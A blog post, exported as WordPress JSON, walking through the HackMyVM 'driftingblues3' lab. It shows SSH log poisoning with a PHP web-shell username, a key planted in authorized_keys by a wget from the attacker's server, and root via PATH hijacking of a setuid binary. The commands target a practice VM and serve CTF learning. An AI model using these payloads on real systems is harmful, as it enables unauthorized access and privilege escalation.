{"id":526,"date":"2024-04-11T14:24:51","date_gmt":"2024-04-11T06:24:51","guid":{"rendered":"http:\/\/162.14.82.114\/?p=526"},"modified":"2024-04-11T14:24:51","modified_gmt":"2024-04-11T06:24:51","slug":"hmv-_-driftingblues3","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/526\/04\/11\/2024\/","title":{"rendered":"hmv[-_-]driftingblues3"},"content":{"rendered":"<h1>driftingblues3<\/h1>\n<p>While working on <code>superhuman<\/code> I found that the fuzzing was taking too long, so I switched to another target machine for now:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424518.png\" alt=\"image-20240411122613084\" style=\"zoom:50%;\" \/><\/p>\n<h2>Information gathering<\/h2>\n<h3>Port scan<\/h3>\n<pre><code class=\"language-bash\">Open 172.20.10.6:22\nOpen 172.20.10.6:80<\/code><\/pre>\n<pre><code class=\"language-text\">PORT   STATE SERVICE REASON  VERSION\n22\/tcp open  ssh     syn-ack OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)\n| ssh-hostkey: \n|   2048 6a:fe:d6:17:23:cb:90:79:2b:b1:2d:37:53:97:46:58 (RSA)\n| ssh-rsa 
AAAAB3NzaC1yc2EAAAADAQABAAABAQC4uqqKMblsYkzCZ7j1Mn8OX4iKqTf55w3nolFxM6IDIrQ7SV4JthEGqnYsiWFGY0OpwHLJ80\/pnc\/Ehlnub7RCGyL5gxGkGhZPKYag6RDv0cJNgIHf5oTkJOaFhRhZPDXztGlfafcVVw0Agxg3xweEVfU0GP24cb7jXq8Obu0j4bNsx7L0xbDCB1zxYwiqBRbkvRWpiQXNns\/4HKlFzO19D8bCY\/GXeX4IekE98kZgcG20x\/zoBjMPXWXHUcYKoIVXQCDmBGAnlIdaC7IBJMNc1YbXVv7vhMRtaf\/ffTtNDX0sYydBbqbubdZJsjWL0oHHK3Uwf+HlEhkO1jBZw3Aj\n|   256 5b:c4:68:d1:89:59:d7:48:b0:96:f3:11:87:1c:08:ac (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBDkds8dHvtrZmMxX2P71ej+q+QDe\/MG8OGk7uYjWBT5K\/TZR\/QUkD9FboGbq1+SpCox5qqIVo8UQ+xvcEDDVKaU=\n|   256 61:39:66:88:1d:8f:f1:d0:40:61:1e:99:c5:1a:1f:f4 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIIoK0bHJ3ceMQ1mfATBnU9sChixXFA613cXEXeAyl2Y2\n80\/tcp open  http    syn-ack Apache httpd 2.4.38 ((Debian))\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: Site doesn&#039;t have a title (text\/html).\n| http-methods: \n|_  Supported Methods: OPTIONS HEAD GET POST\n| http-robots.txt: 1 disallowed entry \n|_\/eventadmins\nService Info: OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n<h3>Directory scan<\/h3>\n<pre><code class=\"language-bash\">feroxbuster -u http:\/\/172.20.10.6 -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -d 2 -s 200 301 302<\/code><\/pre>\n<p>gobuster is busy with the fuzzing run, so I use a different tool here.<\/p>\n<pre><code class=\"language-bash\"> ___  ___  __   __     __      __         __   ___\n|__  |__  |__) |__) | \/  `    \/  \\ \\_\/ | |  \\ |__\n|    |___ |  \\ |  \\ | \\__,    \\__\/ \/ \\ | |__\/ |___\nby Ben &quot;epi&quot; Risher \ud83e\udd13                 ver: 
2.10.2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u252c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfaf  Target Url            \u2502 http:\/\/172.20.10.6\n \ud83d\ude80  Threads               \u2502 50\n \ud83d\udcd6  Wordlist              \u2502 \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n \ud83d\udc4c  Status Codes          \u2502 [200, 301, 302]\n \ud83d\udca5  Timeout (secs)        \u2502 7\n \ud83e\udda1  User-Agent            \u2502 feroxbuster\/2.10.2\n \ud83d\udc89  Config File           \u2502 \/etc\/feroxbuster\/ferox-config.toml\n \ud83d\udd0e  Extract Links         \u2502 true\n \ud83c\udfc1  HTTP methods          \u2502 [GET]\n \ud83d\udd03  Recursion Depth       \u2502 2\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1  Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n301      GET        9l       28w      316c http:\/\/172.20.10.6\/eventadmins =&gt; http:\/\/172.20.10.6\/eventadmins\/\n301      GET        9l       28w      312c http:\/\/172.20.10.6\/privacy =&gt; http:\/\/172.20.10.6\/privacy\/\n200      GET       16l       34w      347c http:\/\/172.20.10.6\/tickets.html\n200      GET     7078l    39790w  3674378c http:\/\/172.20.10.6\/cr.png\n200  
    GET       42l      133w     1373c http:\/\/172.20.10.6\/\n301      GET        9l       28w      311c http:\/\/172.20.10.6\/drupal =&gt; http:\/\/172.20.10.6\/drupal\/\n301      GET        9l       28w      311c http:\/\/172.20.10.6\/secret =&gt; http:\/\/172.20.10.6\/secret\/\n200      GET        1l        1w       11c http:\/\/172.20.10.6\/Makefile\n301      GET        9l       28w      313c http:\/\/172.20.10.6\/wp-admin =&gt; http:\/\/172.20.10.6\/wp-admin\/\n200      GET       97l      823w     7345c http:\/\/172.20.10.6\/wp-admin\/readme.html\n200      GET        1l        3w       20c http:\/\/172.20.10.6\/secret\/devices\n301      GET        9l       28w      315c http:\/\/172.20.10.6\/phpmyadmin =&gt; http:\/\/172.20.10.6\/phpmyadmin\/\n[####################] - 20m  1323290\/1323290 0s      found:12      errors:243    \n[####################] - 20m   220546\/220546  188\/s   http:\/\/172.20.10.6\/ \n[####################] - 20m   220546\/220546  188\/s   http:\/\/172.20.10.6\/eventadmins\/ \n[####################] - 20m   220546\/220546  188\/s   http:\/\/172.20.10.6\/privacy\/ \n[####################] - 19m   220546\/220546  189\/s   http:\/\/172.20.10.6\/drupal\/ \n[####################] - 19m   220546\/220546  189\/s   http:\/\/172.20.10.6\/secret\/ \n[####################] - 0s    220546\/220546  1016341\/s http:\/\/172.20.10.6\/wp-admin\/ =&gt; Directory listing\n[####################] - 19m   220546\/220546  193\/s   http:\/\/172.20.10.6\/phpmyadmin\/             <\/code><\/pre>\n<h3>wpscan scan<\/h3>\n<p>The scan had already turned up <code>wp-admin<\/code>, so I guessed this was a <code>wordpress<\/code> site and scanned it:<\/p>\n<pre><code class=\"language-bash\">wpscan --url http:\/\/172.20.10.6\/\nScan Aborted: The remote website is up, but does not seem to be running WordPress.<\/code><\/pre>\n<p>Uh.<\/p>\n<h2>Exploitation<\/h2>\n<h3>Reconnaissance<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424520.png\" alt=\"image-20240411123238251\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424521.png\" alt=\"image-20240411123249889\" style=\"zoom:50%;\" \/><\/p>\n<h3>Visiting sensitive directories<\/h3>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6\/tickets.html<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424522.png\" alt=\"image-20240411123327602\" \/><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6\/wp-admin\/readme.html\n# The directory contains only one file, this one<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424523.png\" alt=\"image-20240411123440945\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6\/robots.txt<\/code><\/pre>\n<pre><code class=\"language-apl\">User-agent: *\nDisallow: \/eventadmins<\/code><\/pre>\n<pre><code class=\"language-apl\">http:\/\/172.20.10.6\/eventadmins\/<\/code><\/pre>\n<pre><code class=\"language-apl\">man there&#039;s a problem with ssh\njohn said &quot;it&#039;s poisonous!!! 
stay away!!!&quot;\nidk if he&#039;s mentally challenged\nplease find and fix it\nalso check \/littlequeenofspades.html\nyour buddy, buddyG<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424524.png\" alt=\"image-20240411131620733\" style=\"zoom:33%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424525.png\" alt=\"image-20240411131630923\" style=\"zoom: 33%;\" \/><\/p>\n<p>I make a habit of writing write-ups, so this one fell right away!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424526.png\" alt=\"image-20240411131748092\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424527.png\" alt=\"image-20240411131801986\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424528.png\" alt=\"image-20240411131828959\" style=\"zoom:50%;\" \/><\/p>\n<h3>Log injection<\/h3>\n<p>Try log injection: this is the SSH login log!<\/p>\n<pre><code class=\"language-bash\">ssh &#039;&lt;?php system($_GET[&quot;hack&quot;]);?&gt;&#039;@172.20.10.6<\/code><\/pre>\n<blockquote>\n<p>Be sure to check this first, because once it has been sent in it cannot be taken back!<\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ ssh &#039;&lt;?php system($_GET[&quot;hack&quot;]);?&gt;&#039;@172.20.10.6\nremote username contains invalid characters\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ echo -n &quot;&lt;?php system($_GET[&quot;hack&quot;]);?&gt;&quot; | base64\nPD9waHAgc3lzdGVtKCk7Pz4=\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ ssh -p 22 PD9waHAgc3lzdGVtKCk7Pz4=@172.20.10.6\nPD9waHAgc3lzdGVtKCk7Pz4=@172.20.10.6: Permission denied (publickey).<\/code><\/pre>\n<p>But that does not work. You could try connecting from an older virtual machine; here I chose to connect with msf instead:<\/p>\n<pre><code class=\"language-bash\">msf6 &gt; use auxiliary\/scanner\/ssh\/ssh_login\nmsf6 auxiliary(scanner\/ssh\/ssh_login) &gt; show options\n\nModule options (auxiliary\/scanner\/ssh\/ssh_login):\n\n   Name              Current Setting  Required  Description\n   ----              ---------------  --------  -----------\n   ANONYMOUS_LOGIN   false            yes       Attempt to login with a blank username 
and password\n   BLANK_PASSWORDS   false            no        Try blank passwords for all users\n   BRUTEFORCE_SPEED  5                yes       How fast to bruteforce, from 0 to 5\n   DB_ALL_CREDS      false            no        Try each user\/password couple stored in the current database\n   DB_ALL_PASS       false            no        Add all passwords in the current database to the list\n   DB_ALL_USERS      false            no        Add all users in the current database to the list\n   DB_SKIP_EXISTING  none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&amp;realm)\n   PASSWORD                           no        A specific password to authenticate with\n   PASS_FILE                          no        File containing passwords, one per line\n   RHOSTS                             yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-metasploit.html\n   RPORT             22               yes       The target port\n   STOP_ON_SUCCESS   false            yes       Stop guessing when a credential works for a host\n   THREADS           1                yes       The number of concurrent threads (max one per host)\n   USERNAME                           no        A specific username to authenticate as\n   USERPASS_FILE                      no        File containing users and passwords separated by space, one pair per line\n   USER_AS_PASS      false            no        Try the username as the password for all users\n   USER_FILE                          no        File containing usernames, one per line\n   VERBOSE           false            yes       Whether to print output for all attempts\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ssh\/ssh_login) &gt; set rhosts 172.20.10.6\nrhosts =&gt; 172.20.10.6\nmsf6 auxiliary(scanner\/ssh\/ssh_login) &gt; set username &lt;?php 
system($_GET[&#039;hack&#039;]);?&gt;\nusername =&gt; &lt;?php system($_GET[hack]);?&gt;\nmsf6 auxiliary(scanner\/ssh\/ssh_login) &gt; set password 123456\npassword =&gt; 123456\nmsf6 auxiliary(scanner\/ssh\/ssh_login) &gt; show options\n\nModule options (auxiliary\/scanner\/ssh\/ssh_login):\n\n   Name              Current Setting               Required  Description\n   ----              ---------------               --------  -----------\n   ANONYMOUS_LOGIN   false                         yes       Attempt to login with a blank username and password\n   BLANK_PASSWORDS   false                         no        Try blank passwords for all users\n   BRUTEFORCE_SPEED  5                             yes       How fast to bruteforce, from 0 to 5\n   DB_ALL_CREDS      false                         no        Try each user\/password couple stored in the current database\n   DB_ALL_PASS       false                         no        Add all passwords in the current database to the list\n   DB_ALL_USERS      false                         no        Add all users in the current database to the list\n   DB_SKIP_EXISTING  none                          no        Skip existing credentials stored in the current database (Accepted: none, user, user&amp;real\n                                                             m)\n   PASSWORD          123456                        no        A specific password to authenticate with\n   PASS_FILE                                       no        File containing passwords, one per line\n   RHOSTS            172.20.10.6                   yes       The target host(s), see https:\/\/docs.metasploit.com\/docs\/using-metasploit\/basics\/using-me\n                                                             tasploit.html\n   RPORT             22                            yes       The target port\n   STOP_ON_SUCCESS   false                         yes       Stop guessing when a credential works for a host\n   THREADS           1                         
    yes       The number of concurrent threads (max one per host)\n   USERNAME          &lt;?php system($_GET[hack]);?&gt;  no        A specific username to authenticate as\n   USERPASS_FILE                                   no        File containing users and passwords separated by space, one pair per line\n   USER_AS_PASS      false                         no        Try the username as the password for all users\n   USER_FILE                                       no        File containing usernames, one per line\n   VERBOSE           false                         yes       Whether to print output for all attempts\n\nView the full module info with the info, or info -d command.\n\nmsf6 auxiliary(scanner\/ssh\/ssh_login) &gt; run\n\n[*] 172.20.10.6:22 - Starting bruteforce\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed<\/code><\/pre>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424529.png\" alt=\"image-20240411135747633\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424530.png\" alt=\"image-20240411135917985\" style=\"zoom:50%;\" \/><\/p>\n<p>It worked; now try to get a reverse shell back:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424531.png\" alt=\"image-20240411140258791\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404111424532.png\" alt=\"image-20240411140305880\" style=\"zoom:50%;\" \/><\/p>\n<h2>Privilege escalation<\/h2>\n<h3>Switching to the robertj user<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ ssh-keygen -t rsa -b 4096 -f \/home\/kali\/temp\/driftingblues3\/driftingblues3\nGenerating public\/private rsa key pair.\nEnter passphrase (empty for no passphrase): \nEnter same passphrase again: \nYour identification has been saved in \/home\/kali\/temp\/driftingblues3\/driftingblues3\nYour public key has been saved in \/home\/kali\/temp\/driftingblues3\/driftingblues3.pub\nThe key fingerprint is:\nSHA256:aQNB8\/fPotfco8O1\/l+0EQtVma54etvW3tj+QOl\/RqA kali@kali\nThe key&#039;s randomart image is:\n+---[RSA 4096]----+\n|     .+        .=|\n|       +      .o |\n|      . . .  ... |\n|       . o .  ooo|\n|        S   o.++.|\n|       . . 
.EB o+|\n|            =o*++|\n|           o.=+OB|\n|          ...oB*\/|\n+----[SHA256]-----+\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ ls    \ndriftingblues3  driftingblues3.pub\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ mv driftingblues3.pub authorized_keys\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/driftingblues3]\n\u2514\u2500$ python3 -m http.server 8888                                     \nServing HTTP on 0.0.0.0 port 8888 (http:\/\/0.0.0.0:8888\/) ...\n172.20.10.6 - - [11\/Apr\/2024 02:10:09] &quot;GET \/authorized_keys HTTP\/1.1&quot; 200 -<\/code><\/pre>\n<pre><code class=\"language-bash\">(remote) www-data@driftingblues:\/home\/robertj$ ls -la\ntotal 16\ndrwxr-xr-x 3 robertj robertj 4096 Jan  7  2021 .\ndrwxr-xr-x 4 root    root    4096 Jan  4  2021 ..\ndrwx---rwx 2 robertj robertj 4096 Jan  4  2021 .ssh\n-r-x------ 1 robertj robertj   33 Jan  7  2021 user.txt\n(remote) www-data@driftingblues:\/home\/robertj$ cd .ssh\n(remote) www-data@driftingblues:\/home\/robertj\/.ssh$ wget http:\/\/172.20.10.8:8888\/authorized_keys\n--2024-04-11 01:10:11--  http:\/\/172.20.10.8:8888\/authorized_keys\nConnecting to 172.20.10.8:8888... connected.\nHTTP request sent, awaiting response... 
200 OK\nLength: 735 [application\/octet-stream]\nSaving to: &#039;authorized_keys&#039;\n\nauthorized_keys                       100%[=========================================================================&gt;]     735  --.-KB\/s    in 0s      \n\n2024-04-11 01:10:11 (94.4 MB\/s) - &#039;authorized_keys&#039; saved [735\/735]<\/code><\/pre>\n<p>Connect over ssh:<\/p>\n<pre><code class=\"language-bash\">(local) pwncat$ lcd temp\/driftingblues3\n(local) pwncat$ connect robertj@172.20.10.6 -i driftingblues3\n[02:12:18] 172.20.10.6:22: normalizing shell path                                                                                         manager.py:957           172.20.10.6:22: loaded known host from db                                                                                      manager.py:957\n(local) pwncat$                                                                                                                                         \n(remote) robertj@driftingblues:\/home\/robertj$ whoami;id\nrobertj\nuid=1000(robertj) gid=1000(robertj) groups=1000(robertj),1001(operators)<\/code><\/pre>\n<blockquote>\n<p>Running <code>ssh robertj@172.20.10.6 -i driftingblues3<\/code> directly has the same effect<\/p>\n<\/blockquote>\n<h3>Information gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) robertj@driftingblues:\/home\/robertj$ cat user.txt \n413fc08db21285b1f8abea99040b0280\n(remote) robertj@driftingblues:\/home\/robertj$ find \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/eject\/dmcrypt-get-device\n\/usr\/bin\/passwd\n\/usr\/bin\/getinfo\n\/usr\/bin\/mount\n\/usr\/bin\/chfn\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/su\n\/usr\/bin\/gpasswd\n\/usr\/bin\/chsh\n(remote) robertj@driftingblues:\/home\/robertj$ ls -l \/usr\/bin\/getinfo\n-r-sr-s--- 1 root operators 16704 Jan  4  2021 \/usr\/bin\/getinfo\n(remote) 
robertj@driftingblues:\/home\/robertj$ \/usr\/bin\/getinfo\n###################\nip address\n###################\n\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    link\/ether 08:00:27:f1:6a:52 brd ff:ff:ff:ff:ff:ff\n    inet 172.20.10.6\/28 brd 172.20.10.15 scope global dynamic enp0s3\n       valid_lft 79710sec preferred_lft 79710sec\n    inet6 fe80::a00:27ff:fef1:6a52\/64 scope link \n       valid_lft forever preferred_lft forever\n###################\nhosts\n###################\n\n127.0.0.1       localhost\n127.0.1.1       driftingblues\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n###################\nos info\n###################\n\nLinux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU\/Linux\n(remote) robertj@driftingblues:\/home\/robertj$ file \/usr\/bin\/getinfo\n\/usr\/bin\/getinfo: setuid, setgid ELF 64-bit LSB pie executable, x86-64, version 1 (SYSV), dynamically linked, interpreter \/lib64\/ld-linux-x86-64.so.2, BuildID[sha1]=50c270711d2a2d6c688d5c498e50a3d38b4f7ff5, for GNU\/Linux 3.2.0, not stripped\n(remote) robertj@driftingblues:\/home\/robertj$ cd \/usr\/bin\n(remote) robertj@driftingblues:\/usr\/bin$ \n(local) pwncat$ download getinfo\ngetinfo 
\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501\u2501 100.0% \u2022 16.7\/16.7 KB \u2022 ? \u2022 0:00:00[02:16:01] downloaded 16.70KiB in 0.58 seconds <\/code><\/pre>\n<p>\u770b\u5230\u4e86\u5947\u602a\u7684\u4e1c\u897f\uff0c\u4e0b\u8f7d\u5230\u672c\u5730\u770b\u770b\uff1a<\/p>\n<pre><code class=\"language-c\">\/\/ main.c\nundefined8 main(void)\n{\n    setuid(0);\n    puts(&quot;###################\\nip address\\n###################\\n&quot;);\n    system(&quot;ip a&quot;);\n    puts(&quot;###################\\nhosts\\n###################\\n&quot;);\n    system(&quot;cat \/etc\/hosts&quot;);\n    puts(&quot;###################\\nos info\\n###################\\n&quot;);\n    system(&quot;uname -a&quot;);\n    return 0;\n}<\/code><\/pre>\n<p>\u5c1d\u8bd5\u66f4\u6539\u73af\u5883\u53d8\u91cf\uff0c\u4f7f\u6211\u4eec\u5199\u7684\u51fd\u6570\u5148\u6267\u884c\uff1a<\/p>\n<pre><code class=\"language-bash\">(remote) robertj@driftingblues:\/usr\/bin$ ip a\n1: lo: &lt;LOOPBACK,UP,LOWER_UP&gt; mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000\n    link\/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00\n    inet 127.0.0.1\/8 scope host lo\n       valid_lft forever preferred_lft forever\n    inet6 ::1\/128 scope host \n       valid_lft forever preferred_lft forever\n2: enp0s3: &lt;BROADCAST,MULTICAST,UP,LOWER_UP&gt; mtu 1500 qdisc pfifo_fast state UP group default qlen 1000\n    
link\/ether 08:00:27:f1:6a:52 brd ff:ff:ff:ff:ff:ff\n    inet 172.20.10.6\/28 brd 172.20.10.15 scope global dynamic enp0s3\n       valid_lft 79535sec preferred_lft 79535sec\n    inet6 fe80::a00:27ff:fef1:6a52\/64 scope link \n       valid_lft forever preferred_lft forever\n(remote) robertj@driftingblues:\/usr\/bin$ echo $PATH\n\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n(remote) robertj@driftingblues:\/usr\/bin$ cd \/tmp\n(remote) robertj@driftingblues:\/tmp$ whereis ip\nip: \/usr\/bin\/ip \/usr\/sbin\/ip \/usr\/share\/man\/man8\/ip.8.gz \/usr\/share\/man\/man7\/ip.7.gz\n(remote) robertj@driftingblues:\/tmp$ echo &#039;chmod +s \/bin\/bash&#039; &gt; ip \n(remote) robertj@driftingblues:\/tmp$ export PATH=$PWD:$PATH\n(remote) robertj@driftingblues:\/tmp$ ip\nUsage: ip [ OPTIONS ] OBJECT { COMMAND | help }\n       ip [ -force ] -batch filename\nwhere  OBJECT := { link | address | addrlabel | route | rule | neigh | ntable |\n                   tunnel | tuntap | maddress | mroute | mrule | monitor | xfrm |\n                   netns | l2tp | fou | macsec | tcp_metrics | token | netconf | ila |\n                   vrf | sr }\n       OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |\n                    -h[uman-readable] | -iec | -j[son] | -p[retty] |\n                    -f[amily] { inet | inet6 | ipx | dnet | mpls | bridge | link } |\n                    -4 | -6 | -I | -D | -M | -B | -0 |\n                    -l[oops] { maximum-addr-flush-attempts } | -br[ief] |\n                    -o[neline] | -t[imestamp] | -ts[hort] | -b[atch] [filename] |\n                    -rc[vbuf] [size] | -n[etns] name | -a[ll] | -c[olor]}\n(remote) robertj@driftingblues:\/tmp$ echo $PATH\n\/tmp:\/usr\/local\/bin:\/usr\/bin:\/bin:\/usr\/local\/games:\/usr\/games:\/sbin:\/usr\/sbin:\/usr\/local\/sbin\n(remote) robertj@driftingblues:\/tmp$ chmod +x ip\n(remote) robertj@driftingblues:\/tmp$ ip\nUsage: ip [ OPTIONS ] 
OBJECT { COMMAND | help }\n       ip [ -force ] -batch filename\nwhere  OBJECT := { link | address | addrlabel | route | rule | neigh | ntable |\n                   tunnel | tuntap | maddress | mroute | mrule | monitor | xfrm |\n                   netns | l2tp | fou | macsec | tcp_metrics | token | netconf | ila |\n                   vrf | sr }\n       OPTIONS := { -V[ersion] | -s[tatistics] | -d[etails] | -r[esolve] |\n                    -h[uman-readable] | -iec | -j[son] | -p[retty] |\n                    -f[amily] { inet | inet6 | ipx | dnet | mpls | bridge | link } |\n                    -4 | -6 | -I | -D | -M | -B | -0 |\n                    -l[oops] { maximum-addr-flush-attempts } | -br[ief] |\n                    -o[neline] | -t[imestamp] | -ts[hort] | -b[atch] [filename] |\n                    -rc[vbuf] [size] | -n[etns] name | -a[ll] | -c[olor]}\n(remote) robertj@driftingblues:\/tmp$ ls -l \/bin\/bash\n-rwxr-xr-x 1 root root 1168776 Apr 17  2019 \/bin\/bash\n(remote) robertj@driftingblues:\/tmp$ ls\nip\nsystemd-private-fa91ead9eb6547fbb2292f8fa0bb8a88-apache2.service-0f3CMc\nsystemd-private-fa91ead9eb6547fbb2292f8fa0bb8a88-systemd-timesyncd.service-UkKFkN\n(remote) robertj@driftingblues:\/tmp$ sudo -l\n-bash: sudo: command not found\n(remote) robertj@driftingblues:\/tmp$ getinfo\n###################\nip address\n###################\n\n###################\nhosts\n###################\n\n127.0.0.1       localhost\n127.0.1.1       driftingblues\n\n# The following lines are desirable for IPv6 capable hosts\n::1     localhost ip6-localhost ip6-loopback\nff02::1 ip6-allnodes\nff02::2 ip6-allrouters\n###################\nos info\n###################\n\nLinux driftingblues 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64 GNU\/Linux\n(remote) robertj@driftingblues:\/tmp$ ls -l \/bin\/bash\n-rwsr-sr-x 1 root root 1168776 Apr 17  2019 \/bin\/bash\n(remote) robertj@driftingblues:\/tmp$ \/bin\/bash -p\n(remote) root@driftingblues:\/tmp# 
whoami;id\nroot\nuid=1000(robertj) gid=1000(robertj) euid=0(root) egid=0(root) groups=0(root),1000(robertj),1001(operators)\n(remote) root@driftingblues:\/tmp# cd \/root\n(remote) root@driftingblues:\/root# ls -la\ntotal 20\ndrwx------  2 root root 4096 Jan  7  2021 .\ndrwxr-xr-x 18 root root 4096 Dec 17  2020 ..\n-rw-------  1 root root   53 Jan  7  2021 .bash_history\n-r-x------  1 root root   33 Jan  7  2021 root.txt\n-rw-r--r--  1 root root 1031 Jan  4  2021 upit\n(remote) root@driftingblues:\/root# cat root.txt \ndfb7f604a22928afba370d819b35ec83<\/code><\/pre>\n<p>Got the flag!!!<\/p>\n","protected":false},"excerpt":{"rendered":"<p>driftingblues3 While working on superhuman I found the FUZZ was taking too long, so I switched to another target machine first: Information gath 